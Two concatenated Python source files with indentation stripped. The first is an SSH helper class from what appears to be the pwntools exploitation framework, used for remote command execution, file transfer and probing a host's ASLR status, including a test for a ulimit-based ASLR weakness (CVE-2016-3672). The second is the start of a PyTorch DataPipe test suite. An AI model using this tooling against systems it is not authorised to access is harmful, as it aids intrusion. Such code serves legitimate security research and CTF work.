def connect_remote(self, host, port, timeout = Timeout.default):
r"""connect_remote(host, port, timeout = Timeout.default) -> ssh_connecter
Connects to a host through an SSH connection. This is equivalent to
using the ``-L`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_connecter` object.
Examples:
>>> from pwn import *
>>> l = listen()
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> a = s.connect_remote(s.host, l.lport)
>>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
>>> a.sendline(b'Hello')
>>> print(repr(b.recvline()))
b'Hello\n'
"""
return ssh_connecter(self, host, port, timeout, level=self.level)
remote = connect_remote
def listen_remote(self, port = 0, bind_address = '', timeout = Timeout.default):
r"""listen_remote(port = 0, bind_address = '', timeout = Timeout.default) -> ssh_connecter
Listens remotely through an SSH connection. This is equivalent to
using the ``-R`` flag on ``ssh``.
Returns a :class:`pwnlib.tubes.ssh.ssh_listener` object.
Examples:
>>> from pwn import *
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> l = s.listen_remote()
>>> a = remote(s.host, l.port)
>>> a=a; b = l.wait_for_connection() # a=a; prevents hangs
>>> a.sendline(b'Hello')
>>> print(repr(b.recvline()))
b'Hello\n'
"""
return ssh_listener(self, bind_address, port, timeout, level=self.level)
listen = listen_remote
def __getitem__(self, attr):
"""Permits indexed access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print(repr(s['echo hello']))
b'hello'
"""
return self.__getattr__(attr)()
def __call__(self, attr):
"""Permits function-style access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> print(repr(s('echo hello')))
b'hello'
"""
return self.__getattr__(attr)()
def __getattr__(self, attr):
"""Permits member access to run commands over SSH
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.echo('hello')
b'hello'
>>> s.whoami()
b'travis'
>>> s.echo(['huh','yay','args'])
b'huh yay args'
"""
bad_attrs = [
'trait_names', # ipython tab-complete
]
if attr in self.__dict__ \
or attr in bad_attrs \
or attr.startswith('_'):
raise AttributeError
def runner(*args):
if len(args) == 1 and isinstance(args[0], (list, tuple)):
command = [attr] + args[0]
else:
command = ' '.join((attr,) + args)
return self.run(command).recvall().strip()
return runner
def connected(self):
"""Returns True if we are connected.
Example:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.connected()
True
>>> s.close()
>>> s.connected()
False
"""
return bool(self.client and self.client.get_transport().is_active())
def close(self):
"""Close the connection."""
if self.client:
self.client.close()
self.client = None
self.info("Closed connection to %r" % self.host)
def _libs_remote(self, remote):
"""Return a dictionary of the libraries used by a remote file."""
escaped_remote = sh_string(remote)
cmd = ''.join([
'(',
'ulimit -s unlimited;',
'ldd %s > /dev/null &&' % escaped_remote,
'(',
'LD_TRACE_LOADED_OBJECTS=1 %s||' % escaped_remote,
'ldd %s' % escaped_remote,
'))',
' 2>/dev/null'
])
data, status = self.run_to_end(cmd)
if status != 0:
self.error('Unable to find libraries for %r' % remote)
return {}
return misc.parse_ldd_output(context._decode(data))
def _get_fingerprint(self, remote):
cmd = '(sha256 || sha256sum || openssl sha256) 2>/dev/null < '
cmd = cmd + sh_string(remote)
data, status = self.run_to_end(cmd)
if status != 0:
return None
# OpenSSL outputs in the format of...
# (stdin)= e3b0c4429...
data = data.replace(b'(stdin)= ',b'')
# sha256 and sha256sum outputs in the format of...
# e3b0c442... -
data = data.replace(b'-',b'').strip()
if not isinstance(data, str):
data = data.decode('ascii')
return data
def _get_cachefile(self, fingerprint):
return os.path.join(self._cachedir, fingerprint)
def _verify_local_fingerprint(self, fingerprint):
if not set(fingerprint).issubset(string.hexdigits) or \
len(fingerprint) != 64:
self.error('Invalid fingerprint %r' % fingerprint)
return False
local = self._get_cachefile(fingerprint)
if not os.path.isfile(local):
return False
if hashes.sha256filehex(local) == fingerprint:
return True
else:
os.unlink(local)
return False
def _download_raw(self, remote, local, h):
def update(has, total):
h.status("%s/%s" % (misc.size(has), misc.size(total)))
if self.sftp:
try:
self.sftp.get(remote, local, update)
return
except IOError:
pass
cmd = 'wc -c < ' + sh_string(remote)
total, exitcode = self.run_to_end(cmd)
if exitcode != 0:
h.failure("%r does not exist or is not accessible" % remote)
return
total = int(total)
with context.local(log_level = 'ERROR'):
cmd = 'cat < ' + sh_string(remote)
c = self.run(cmd)
data = b''
while True:
try:
data += c.recv()
except EOFError:
break
update(len(data), total)
result = c.wait()
if result != 0:
h.failure('Could not download file %r (%r)' % (remote, result))
return
with open(local, 'wb') as fd:
fd.write(data)
def _download_to_cache(self, remote, p):
with context.local(log_level='error'):
remote = self.readlink('-f',remote)
if not hasattr(remote, 'encode'):
remote = remote.decode('utf-8')
fingerprint = self._get_fingerprint(remote)
if fingerprint is None:
local = os.path.normpath(remote)
local = os.path.basename(local)
local += time.strftime('-%Y-%m-%d-%H:%M:%S')
local = os.path.join(self._cachedir, local)
self._download_raw(remote, local, p)
return local
local = self._get_cachefile(fingerprint)
if self.cache and self._verify_local_fingerprint(fingerprint):
p.success('Found %r in ssh cache' % remote)
else:
self._download_raw(remote, local, p)
if not self._verify_local_fingerprint(fingerprint):
p.failure('Could not download file %r' % remote)
return local
def download_data(self, remote):
"""Downloads a file from the remote server and returns it as a string.
Arguments:
remote(str): The remote filename to download.
Examples:
>>> with open('/tmp/bar','w+') as f:
... _ = f.write('Hello, world')
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass',
... cache=False)
>>> s.download_data('/tmp/bar')
b'Hello, world'
>>> s._sftp = None
>>> s._tried_sftp = True
>>> s.download_data('/tmp/bar')
b'Hello, world'
"""
with self.progress('Downloading %r' % remote) as p:
with open(self._download_to_cache(remote, p), 'rb') as fd:
return fd.read()
def download_file(self, remote, local = None):
"""Downloads a file from the remote server.
The file is cached in /tmp/pwntools-ssh-cache using a hash of the file, so
calling the function twice has little overhead.
Arguments:
remote(str): The remote filename to download
local(str): The local filename to save it to. Default is to infer it from the remote filename.
"""
if not local:
local = os.path.basename(os.path.normpath(remote))
if os.path.basename(remote) == remote:
remote = os.path.join(self.cwd, remote)
with self.progress('Downloading %r to %r' % (remote, local)) as p:
local_tmp = self._download_to_cache(remote, p)
# Check to see if an identical copy of the file already exists
if not os.path.exists(local) or hashes.sha256filehex(local_tmp) != hashes.sha256filehex(local):
shutil.copy2(local_tmp, local)
def download_dir(self, remote=None, local=None):
"""Recursively downloads a directory from the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
if self.sftp:
remote = str(self.sftp.normalize(remote))
else:
with context.local(log_level='error'):
remote = self.system('readlink -f ' + sh_string(remote))
basename = os.path.basename(remote)
local = local or '.'
local = os.path.expanduser(local)
self.info("Downloading %r to %r" % (basename,local))
with context.local(log_level='error'):
remote_tar = self.mktemp()
cmd = 'tar -C %s -czf %s %s' % \
(sh_string(remote),
sh_string(remote_tar),
sh_string(basename))
tar = self.system(cmd)
if 0 != tar.wait():
self.error("Could not create remote tar")
local_tar = tempfile.NamedTemporaryFile(suffix='.tar.gz')
self.download_file(remote_tar, local_tar.name)
tar = tarfile.open(local_tar.name)
tar.extractall(local)
def upload_data(self, data, remote):
"""Uploads some data into a file on the remote server.
Arguments:
data(str): The data to upload.
remote(str): The filename to upload it to.
Example:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> s.upload_data(b'Hello, world', '/tmp/upload_foo')
>>> print(open('/tmp/upload_foo').read())
Hello, world
>>> s._sftp = False
>>> s._tried_sftp = True
>>> s.upload_data(b'Hello, world', '/tmp/upload_bar')
>>> print(open('/tmp/upload_bar').read())
Hello, world
"""
data = context._encode(data)
# If a relative path was provided, prepend the cwd
if os.path.normpath(remote) == os.path.basename(remote):
remote = os.path.join(self.cwd, remote)
if self.sftp:
with tempfile.NamedTemporaryFile() as f:
f.write(data)
f.flush()
self.sftp.put(f.name, remote)
return
with context.local(log_level = 'ERROR'):
cmd = 'cat > ' + sh_string(remote)
s = self.run(cmd, tty=False)
s.send(data)
s.shutdown('send')
data = s.recvall()
result = s.wait()
if result != 0:
self.error("Could not upload file %r (%r)\n%s" % (remote, result, data))
def upload_file(self, filename, remote = None):
"""Uploads a file to the remote server. Returns the remote filename.
Arguments:
filename(str): The local filename to download
remote(str): The remote filename to save it to. Default is to infer it from the local filename."""
if remote is None:
remote = os.path.normpath(filename)
remote = os.path.basename(remote)
remote = os.path.join(self.cwd, remote)
with open(filename, 'rb') as fd:
data = fd.read()
self.info("Uploading %r to %r" % (filename,remote))
self.upload_data(data, remote)
return remote
def upload_dir(self, local, remote=None):
"""Recursively uploads a directory onto the remote server
Arguments:
local: Local directory
remote: Remote directory
"""
remote = remote or self.cwd
local = os.path.expanduser(local)
dirname = os.path.dirname(local)
basename = os.path.basename(local)
if not os.path.isdir(local):
self.error("%r is not a directory" % local)
msg = "Uploading %r to %r" % (basename,remote)
with self.waitfor(msg):
# Generate a tarfile with everything inside of it
local_tar = tempfile.mktemp()
with tarfile.open(local_tar, 'w:gz') as tar:
tar.add(local, basename)
# Upload and extract it
with context.local(log_level='error'):
remote_tar = self.mktemp('--suffix=.tar.gz')
self.upload_file(local_tar, remote_tar)
untar = self.run('cd %s && tar -xzf %s' % (remote, remote_tar))
message = untar.recvrepeat(2)
if untar.wait() != 0:
self.error("Could not untar %r on the remote end\n%s" % (remote_tar, message))
def upload(self, file_or_directory, remote=None):
"""upload(file_or_directory, remote=None)
Upload a file or directory to the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
remote(str): Local path to store the data.
By default, uses the working directory.
"""
if isinstance(file_or_directory, str):
file_or_directory = os.path.expanduser(file_or_directory)
file_or_directory = os.path.expandvars(file_or_directory)
if os.path.isfile(file_or_directory):
return self.upload_file(file_or_directory, remote)
if os.path.isdir(file_or_directory):
return self.upload_dir(file_or_directory, remote)
self.error('%r does not exist' % file_or_directory)
def download(self, file_or_directory, local=None):
"""download(file_or_directory, local=None)
Download a file or directory from the remote host.
Arguments:
file_or_directory(str): Path to the file or directory to download.
local(str): Local path to store the data.
By default, uses the current directory.
"""
if not self.sftp:
self.error("Cannot determine remote file type without SFTP")
with self.system('test -d ' + sh_string(file_or_directory)) as io:
is_dir = io.wait()
if 0 == is_dir:
self.download_dir(file_or_directory, local)
else:
self.download_file(file_or_directory, local)
put = upload
get = download
def unlink(self, file):
"""unlink(file)
Delete the file on the remote host
Arguments:
file(str): Path to the file
"""
if not self.sftp:
self.error("unlink() is only supported if SFTP is supported")
return self.sftp.unlink(file)
def libs(self, remote, directory = None):
"""Downloads the libraries referred to by a file.
This is done by running ldd on the remote server, parsing the output
and downloading the relevant files.
The directory argument specified where to download the files. This defaults
to './$HOSTNAME' where $HOSTNAME is the hostname of the remote server."""
libs = self._libs_remote(remote)
remote = context._decode(self.readlink('-f',remote).strip())
libs[remote] = 0
if directory is None:
directory = self.host
directory = os.path.realpath(directory)
res = {}
seen = set()
for lib, addr in libs.items():
local = os.path.realpath(os.path.join(directory, '.' + os.path.sep + lib))
if not local.startswith(directory):
self.warning('This seems fishy: %r' % lib)
continue
misc.mkdir_p(os.path.dirname(local))
if lib not in seen:
self.download_file(lib, local)
seen.add(lib)
res[local] = addr
return res
def interactive(self, shell=None):
"""Create an interactive session.
This is a simple wrapper for creating a new
:class:`pwnlib.tubes.ssh.ssh_channel` object and calling
:meth:`pwnlib.tubes.ssh.ssh_channel.interactive` on it."""
s = self.shell(shell)
if self.cwd != '.':
cmd = 'cd ' + sh_string(self.cwd)
s.sendline(cmd)
s.interactive()
s.close()
def set_working_directory(self, wd = None, symlink = False):
"""Sets the working directory in which future commands will
be run (via ssh.run) and to which files will be uploaded/downloaded
from if no path is provided
Note:
This uses ``mktemp -d`` under the covers, sets permissions
on the directory to ``0700``. This means that setuid binaries
will **not** be able to access files created in this directory.
In order to work around this, we also ``chmod +x`` the directory.
Arguments:
wd(string): Working directory. Default is to auto-generate a directory
based on the result of running 'mktemp -d' on the remote machine.
symlink(bool,str): Create symlinks in the new directory.
The default value, ``False``, implies that no symlinks should be
created.
A string value is treated as a path that should be symlinked.
It is passed directly to the shell on the remote end for expansion,
so wildcards work.
Any other value is treated as a boolean, where ``True`` indicates
that all files in the "old" working directory should be symlinked.
Examples:
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> cwd = s.set_working_directory()
>>> s.ls()
b''
>>> s.pwd() == cwd
True
>>> s = ssh(host='example.pwnme',
... user='travis',
... password='demopass')
>>> homedir = s.pwd()
>>> _=s.touch('foo')
>>> _=s.set_working_directory()
>>> assert s.ls() == b''
>>> _=s.set_working_directory(homedir)
>>> assert b'foo' in s.ls().split()
>>> _=s.set_working_directory(symlink=True)
>>> assert b'foo' in s.ls().split()
>>> assert homedir != s.pwd()
>>> symlink=os.path.join(homedir,b'*')
>>> _=s.set_working_directory(symlink=symlink)
>>> assert b'foo' in s.ls().split()
>>> assert homedir != s.pwd()
"""
status = 0
if symlink and not isinstance(symlink, (six.binary_type, six.text_type)):
symlink = os.path.join(self.pwd(), b'*')
if not hasattr(symlink, 'encode') and hasattr(symlink, 'decode'):
symlink = symlink.decode('utf-8')
if not wd:
wd, status = self.run_to_end('x=$(mktemp -d) && cd $x && chmod +x . && echo $PWD', wd='.')
wd = wd.strip()
if status:
self.error("Could not generate a temporary directory (%i)\n%s" % (status, wd))
else:
cmd = b'ls ' + sh_string(wd)
_, status = self.run_to_end(cmd, wd = '.')
if status:
self.error("%r does not appear to exist" % wd)
self.cwd = wd
if not isinstance(wd, str):
self.cwd = wd.decode('utf-8')
self.info("Working directory: %r" % self.cwd)
if symlink:
self.ln('-s', symlink, '.')
return wd
def write(self, path, data):
"""Wrapper around upload_data to match :func:`pwnlib.util.misc.write`"""
return self.upload_data(data, path)
def read(self, path):
"""Wrapper around download_data to match :func:`pwnlib.util.misc.read`"""
return self.download_data(path)
def _init_remote_platform_info(self):
r"""Fills _platform_info, e.g.:
::
{'distro': 'Ubuntu\n',
'distro_ver': '14.04\n',
'machine': 'x86_64',
'node': 'pwnable.kr',
'processor': 'x86_64',
'release': '3.11.0-12-generic',
'system': 'linux',
'version': '#19-ubuntu smp wed oct 9 16:20:46 utc 2013'}
"""
if self._platform_info:
return
def preexec():
import platform
print('\n'.join(platform.uname()))
with context.quiet:
with self.process('true', preexec_fn=preexec) as io:
self._platform_info = {
'system': io.recvline().lower().strip().decode(),
'node': io.recvline().lower().strip().decode(),
'release': io.recvline().lower().strip().decode(),
'version': io.recvline().lower().strip().decode(),
'machine': io.recvline().lower().strip().decode(),
'processor': io.recvline().lower().strip().decode(),
'distro': 'Unknown',
'distro_ver': ''
}
try:
if not self.which('lsb_release'):
return
with self.process(['lsb_release', '-irs']) as io:
self._platform_info.update({
'distro': io.recvline().strip().decode(),
'distro_ver': io.recvline().strip().decode()
})
except Exception:
pass
@property
def os(self):
""":class:`str`: Operating System of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(os=self._platform_info['system']):
return context.os
except Exception:
return "Unknown"
@property
def arch(self):
""":class:`str`: CPU Architecture of the remote machine."""
try:
self._init_remote_platform_info()
with context.local(arch=self._platform_info['machine']):
return context.arch
except Exception:
return "Unknown"
@property
def bits(self):
""":class:`str`: Pointer size of the remote machine."""
try:
with context.local():
context.clear()
context.arch = self.arch
return context.bits
except Exception:
return context.bits
@property
def version(self):
""":class:`tuple`: Kernel version of the remote machine."""
try:
self._init_remote_platform_info()
vers = self._platform_info['release']
# 3.11.0-12-generic
expr = r'([0-9]+\.?)+'
vers = re.search(expr, vers).group()
return tuple(map(int, vers.split('.')))
except Exception:
return (0,0,0)
@property
def distro(self):
""":class:`tuple`: Linux distribution name and release."""
try:
self._init_remote_platform_info()
return (self._platform_info['distro'], self._platform_info['distro_ver'])
except Exception:
return ("Unknown", "Unknown")
@property
def aslr(self):
""":class:`bool`: Whether ASLR is enabled on the system.
Example:
>>> s = ssh("travis", "example.pwnme")
>>> s.aslr
True
"""
if self._aslr is None:
if self.os != 'linux':
self.warn_once("Only Linux is supported for ASLR checks.")
self._aslr = False
else:
with context.quiet:
rvs = self.read('/proc/sys/kernel/randomize_va_space')
self._aslr = not rvs.startswith(b'0')
return self._aslr
@property
def aslr_ulimit(self):
""":class:`bool`: Whether the entropy of 32-bit processes can be reduced with ulimit."""
import pwnlib.elf.elf
import pwnlib.shellcraft
if self._aslr_ulimit is not None:
return self._aslr_ulimit
# This test must run a 32-bit binary, fix the architecture
arch = {
'amd64': 'i386',
'aarch64': 'arm'
}.get(self.arch, self.arch)
with context.local(arch=arch, bits=32, os=self.os, aslr=True):
with context.quiet:
try:
sc = pwnlib.shellcraft.cat('/proc/self/maps') \
+ pwnlib.shellcraft.exit(0)
elf = pwnlib.elf.elf.ELF.from_assembly(sc, shared=True)
except Exception:
self.warn_once("Can't determine ulimit ASLR status")
self._aslr_ulimit = False
return self._aslr_ulimit
def preexec():
import resource
try:
resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
except Exception:
pass
# Move to a new temporary directory
cwd = self.cwd
tmp = self.set_working_directory()
try:
self.upload(elf.path, './aslr-test')
except IOError:
self.warn_once("Couldn't check ASLR ulimit trick")
self._aslr_ulimit = False
return False
self.process(['chmod', '+x', './aslr-test']).wait()
maps = self.process(['./aslr-test'], preexec_fn=preexec).recvall()
# Move back to the old directory
self.cwd = cwd
# Clean up the files
self.process(['rm', '-rf', tmp]).wait()
# Check for 555555000 (1/3 of the address space for PAE)
# and for 40000000 (1/3 of the address space with 3BG barrier)
self._aslr_ulimit = bool(b'55555000' in maps or b'40000000' in maps)
return self._aslr_ulimit
def _checksec_cache(self, value=None):
path = self._get_cachefile('%s-%s' % (self.host, self.port))
if value is not None:
with open(path, 'w+') as f:
f.write(value)
elif os.path.exists(path):
with open(path, 'r+') as f:
return f.read()
def checksec(self, banner=True):
"""checksec()
Prints a helpful message about the remote system.
Arguments:
banner(bool): Whether to print the path to the ELF binary.
"""
cached = self._checksec_cache()
if cached:
return cached
red = text.red
green = text.green
yellow = text.yellow
res = [
"%s@%s:" % (self.user, self.host),
"Distro".ljust(10) + ' '.join(self.distro),
"OS:".ljust(10) + self.os,
"Arch:".ljust(10) + self.arch,
"Version:".ljust(10) + '.'.join(map(str, self.version)),
"ASLR:".ljust(10) + {
True: green("Enabled"),
False: red("Disabled")
}[self.aslr]
]
if self.aslr_ulimit:
res += [ "Note:".ljust(10) + red("Susceptible to ASLR ulimit trick (CVE-2016-3672)")]
cached = '\n'.join(res)
self._checksec_cache(cached)
return cached
|
test_datapipe.py
|
import http.server
import itertools
import os
import os.path
import pickle
import random
import socketserver
import sys
import tarfile
import tempfile
import threading
import time
import unittest
import warnings
import zipfile
from functools import partial
from typing import (
Any,
Awaitable,
Dict,
Generic,
Iterator,
List,
NamedTuple,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
)
from unittest import skipIf
import numpy as np
import torch
import torch.utils.data.backward_compatibility
import torch.utils.data.datapipes as dp
import torch.utils.data.graph
import torch.utils.data.sharding
from torch.testing._internal.common_utils import TestCase, run_tests, suppress_warnings
from torch.utils.data import (
DataLoader,
DataChunk,
IterDataPipe,
MapDataPipe,
RandomSampler,
argument_validation,
runtime_validation,
runtime_validation_disabled,
)
from torch.utils.data.datapipes.utils.decoder import (
basichandlers as decoder_basichandlers,
)
try:
import dill
# XXX: By default, dill writes the Pickler dispatch table to inject its
# own logic there. This globally affects the behavior of the standard library
# pickler for any user who transitively depends on this module!
# Undo this extension to avoid altering the behavior of the pickler globally.
dill.extend(use_dill=False)
HAS_DILL = True
except ImportError:
HAS_DILL = False
skipIfNoDill = skipIf(not HAS_DILL, "no dill")
try:
import pandas # type: ignore[import] # noqa: F401 F403
HAS_PANDAS = True
except ImportError:
HAS_PANDAS = False
skipIfNoDataFrames = skipIf(not HAS_PANDAS, "no dataframes (pandas)")
T_co = TypeVar("T_co", covariant=True)
def create_temp_dir_and_files():
# The temp dir and files within it will be released and deleted in tearDown().
# Adding `noqa: P201` to avoid mypy's warning on not releasing the dir handle within this function.
temp_dir = tempfile.TemporaryDirectory() # noqa: P201
temp_dir_path = temp_dir.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.txt') as f:
temp_file1_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.byte') as f:
temp_file2_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.empty') as f:
temp_file3_name = f.name
with open(temp_file1_name, 'w') as f1:
f1.write('0123456789abcdef')
with open(temp_file2_name, 'wb') as f2:
f2.write(b"0123456789abcdef")
temp_sub_dir = tempfile.TemporaryDirectory(dir=temp_dir_path) # noqa: P201
temp_sub_dir_path = temp_sub_dir.name
with tempfile.NamedTemporaryFile(dir=temp_sub_dir_path, delete=False, suffix='.txt') as f:
temp_sub_file1_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_sub_dir_path, delete=False, suffix='.byte') as f:
temp_sub_file2_name = f.name
with open(temp_sub_file1_name, 'w') as f1:
f1.write('0123456789abcdef')
with open(temp_sub_file2_name, 'wb') as f2:
f2.write(b"0123456789abcdef")
return [(temp_dir, temp_file1_name, temp_file2_name, temp_file3_name),
(temp_sub_dir, temp_sub_file1_name, temp_sub_file2_name)]
# Given a DataPipe and integer n, iterate the DataPipe for n elements and store the elements into a list
# Then, reset the DataPipe and return a tuple of two lists
# 1. A list of elements yielded before the reset
# 2. A list of all elements of the DataPipe after the reset
def reset_after_n_next_calls(datapipe: IterDataPipe[T_co], n: int) -> Tuple[List[T_co], List[T_co]]:
it = iter(datapipe)
res_before_reset = []
for _ in range(n):
res_before_reset.append(next(it))
return res_before_reset, list(datapipe)
class TestDataChunk(TestCase):
def setUp(self):
self.elements = list(range(10))
random.shuffle(self.elements)
self.chunk: DataChunk[int] = DataChunk(self.elements)
def test_getitem(self):
for i in range(10):
self.assertEqual(self.elements[i], self.chunk[i])
def test_iter(self):
for ele, dc in zip(self.elements, iter(self.chunk)):
self.assertEqual(ele, dc)
def test_len(self):
self.assertEqual(len(self.elements), len(self.chunk))
def test_as_string(self):
self.assertEqual(str(self.chunk), str(self.elements))
batch = [self.elements] * 3
chunks: List[DataChunk[int]] = [DataChunk(self.elements)] * 3
self.assertEqual(str(batch), str(chunks))
def test_sort(self):
chunk: DataChunk[int] = DataChunk(self.elements)
chunk.sort()
self.assertTrue(isinstance(chunk, DataChunk))
for i, d in enumerate(chunk):
self.assertEqual(i, d)
def test_reverse(self):
chunk: DataChunk[int] = DataChunk(self.elements)
chunk.reverse()
self.assertTrue(isinstance(chunk, DataChunk))
for i in range(10):
self.assertEqual(chunk[i], self.elements[9 - i])
def test_random_shuffle(self):
elements = list(range(10))
chunk: DataChunk[int] = DataChunk(elements)
rng = random.Random(0)
rng.shuffle(chunk)
rng = random.Random(0)
rng.shuffle(elements)
self.assertEqual(chunk, elements)
class TestIterableDataPipeBasic(TestCase):
def setUp(self):
ret = create_temp_dir_and_files()
self.temp_dir = ret[0][0]
self.temp_files = ret[0][1:]
self.temp_sub_dir = ret[1][0]
self.temp_sub_files = ret[1][1:]
def tearDown(self):
try:
self.temp_sub_dir.cleanup()
self.temp_dir.cleanup()
except Exception as e:
warnings.warn("TestIterableDatasetBasic was not able to cleanup temp dir due to {}".format(str(e)))
def test_listdirfiles_iterable_datapipe(self):
temp_dir = self.temp_dir.name
datapipe = dp.iter.FileLister(temp_dir, '')
count = 0
for pathname in datapipe:
count = count + 1
self.assertTrue(pathname in self.temp_files)
self.assertEqual(count, len(self.temp_files))
count = 0
datapipe = dp.iter.FileLister(temp_dir, '', recursive=True)
for pathname in datapipe:
count = count + 1
self.assertTrue((pathname in self.temp_files) or (pathname in self.temp_sub_files))
self.assertEqual(count, len(self.temp_files) + len(self.temp_sub_files))
def test_loadfilesfromdisk_iterable_datapipe(self):
# test import datapipe class directly
from torch.utils.data.datapipes.iter import (
FileLister,
FileLoader,
)
temp_dir = self.temp_dir.name
datapipe1 = FileLister(temp_dir, '')
datapipe2 = FileLoader(datapipe1)
count = 0
for rec in datapipe2:
count = count + 1
self.assertTrue(rec[0] in self.temp_files)
with open(rec[0], 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
self.assertEqual(count, len(self.temp_files))
# TODO(VitalyFedyunin): Generates unclosed buffer warning, need to investigate
def test_readfilesfromtar_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
tar.add(self.temp_files[0])
tar.add(self.temp_files[1])
tar.add(self.temp_files[2])
datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.TarArchiveReader(datapipe2)
# read extracted files before reaching the end of the tarfile
for rec, temp_file in itertools.zip_longest(datapipe3, self.temp_files):
self.assertTrue(rec is not None and temp_file is not None)
self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
# read extracted files after reaching the end of the tarfile
data_refs = list(datapipe3)
self.assertEqual(len(data_refs), len(self.temp_files))
for data_ref, temp_file in zip(data_refs, self.temp_files):
self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(data_ref[1].read(), f.read())
data_ref[1].close()
def test_readfilesfromzip_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_zipfile_pathname = os.path.join(temp_dir, "test_zip.zip")
with zipfile.ZipFile(temp_zipfile_pathname, 'w') as myzip:
myzip.write(self.temp_files[0])
myzip.write(self.temp_files[1])
myzip.write(self.temp_files[2])
datapipe1 = dp.iter.FileLister(temp_dir, '*.zip')
datapipe2 = dp.iter.ZipArchiveReader(datapipe1)
# Test Case: read extracted files before reaching the end of the zipfile
for rec, temp_file in itertools.zip_longest(datapipe2, self.temp_files):
self.assertTrue(rec is not None and temp_file is not None)
self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
# Test Case: read extracted files after reaching the end of the zipile
data_refs = list(datapipe2)
self.assertEqual(len(data_refs), len(self.temp_files))
for data_ref, temp_file in zip(data_refs, self.temp_files):
self.assertEqual(os.path.basename(data_ref[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(data_ref[1].read(), f.read())
data_ref[1].close()
# Test Case: reset the DataPipe after reading part of it
n_elements_before_reset = 1
res_before_reset, res_after_reset = reset_after_n_next_calls(datapipe2, n_elements_before_reset)
# Check the results accumulated before reset
self.assertEqual(len(res_before_reset), n_elements_before_reset)
for ele_before_reset, temp_file in zip(res_before_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_before_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_before_reset[1].read(), f.read())
ele_before_reset[1].close()
# Check the results accumulated after reset
self.assertEqual(len(res_after_reset), len(self.temp_files))
for ele_after_reset, temp_file in zip(res_after_reset, self.temp_files):
self.assertEqual(os.path.basename(ele_after_reset[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(ele_after_reset[1].read(), f.read())
ele_after_reset[1].close()
def test_routeddecoder_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_pngfile_pathname = os.path.join(temp_dir, "test_png.png")
png_data = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
np.save(temp_pngfile_pathname, png_data)
datapipe1 = dp.iter.FileLister(temp_dir, ['*.png', '*.txt'])
datapipe2 = dp.iter.FileLoader(datapipe1)
def _png_decoder(extension, data):
if extension != 'png':
return None
return np.load(data)
def _helper(prior_dp, dp, channel_first=False):
# Byte stream is not closed
for inp in prior_dp:
self.assertFalse(inp[1].closed)
for inp, rec in zip(prior_dp, dp):
ext = os.path.splitext(rec[0])[1]
if ext == '.png':
expected = np.array([[[1., 0., 0.], [1., 0., 0.]], [[1., 0., 0.], [1., 0., 0.]]], dtype=np.single)
if channel_first:
expected = expected.transpose(2, 0, 1)
self.assertEqual(rec[1], expected)
else:
with open(rec[0], 'rb') as f:
self.assertEqual(rec[1], f.read().decode('utf-8'))
# Corresponding byte stream is closed by Decoder
self.assertTrue(inp[1].closed)
cached = list(datapipe2)
datapipe3 = dp.iter.RoutedDecoder(cached, _png_decoder)
datapipe3.add_handler(decoder_basichandlers)
_helper(cached, datapipe3)
cached = list(datapipe2)
datapipe4 = dp.iter.RoutedDecoder(cached, decoder_basichandlers)
datapipe4.add_handler(_png_decoder)
_helper(cached, datapipe4, channel_first=True)
# TODO(VitalyFedyunin): Generates unclosed buffer warning, need to investigate
def test_groupby_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
file_list = [
"a.png", "b.png", "c.json", "a.json", "c.png", "b.json", "d.png",
"d.json", "e.png", "f.json", "g.png", "f.png", "g.json", "e.json",
"h.txt", "h.json"]
with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
for file_name in file_list:
file_pathname = os.path.join(temp_dir, file_name)
with open(file_pathname, 'w') as f:
f.write('12345abcde')
tar.add(file_pathname)
datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.TarArchiveReader(datapipe2)
def group_fn(data):
filepath, _ = data
return os.path.basename(filepath).split(".")[0]
